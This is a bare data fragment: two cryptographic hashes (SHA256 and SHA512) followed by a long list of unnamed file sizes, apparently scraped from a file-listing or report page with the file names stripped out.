SHA2569be5e012d40ddccd58385b4ed9254b7955116e272f20593f386b521d707d75e8
SHA51284cf3eec60a82a27760a950cc279ab1139eafe6cbe3e6431b05eff57a0235616b8169f5e0d5c1888206184c838dc7a690fbb3c4a0e7aad69be2f95eb4db220ce
-
Filesize
104KB
-
Filesize
112KB
-
Filesize
724KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
112KB
-
Filesize
32KB
-
Filesize
24KB
-
Filesize
40KB
-
Filesize
136KB
-
Filesize
400KB
-
Filesize
400KB
-
Filesize
2.0MB
-
Filesize
316KB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
2.6MB
-
Filesize
400KB
-
Filesize
400KB
-
Filesize
632KB
-
Filesize
316KB
-
Filesize
2.0MB
-
Filesize
2.2MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
2.0MB
-
Filesize
316KB
-
Filesize
2.2MB
-
Filesize
632KB
-
Filesize
316KB
-
Filesize
316KB
-
Filesize
632KB
-
Filesize
316KB
-
Filesize
2.2MB
-
Filesize
2.0MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
3.1MB
-
Filesize
316KB
-
Filesize
2.0MB
-
Filesize
632KB
-
Filesize
2.2MB
-
Filesize
316KB
-
Filesize
3.3MB
-
Filesize
6.5MB
-
Filesize
5.6MB
-
Filesize
600KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
216KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
104KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
316KB
-
Filesize
2.0MB
-
Filesize
140KB
-
Filesize
140KB
-
Filesize
2.6MB
-
Filesize
2.0MB
-
Filesize
632KB
-
Filesize
316KB
-
Filesize
2.2MB
-
Filesize
2.0MB
-
Filesize
316KB
-
Filesize
40KB
-
Filesize
896KB
-
Filesize
888KB
-
Filesize
784KB
-
Filesize
584KB
-
Filesize
344KB
-
Filesize
888KB
-
Filesize
400KB
-
Filesize
400KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
3.3MB
-
Filesize
68KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
80KB
-
Filesize
3.3MB
-
Filesize
304KB
-
Filesize
56KB
-
Filesize
120KB
-
Filesize
652KB
-
Filesize
40KB
-
Filesize
344KB
-
Filesize
1.0MB
-
Filesize
304KB
-
Filesize
336KB
-
Filesize
672KB
-
Filesize
396KB
-
Filesize
396KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
712KB
-
Filesize
320KB
-
Filesize
672KB
-
Filesize
2.6MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
10.1MB
-
Filesize
10.1MB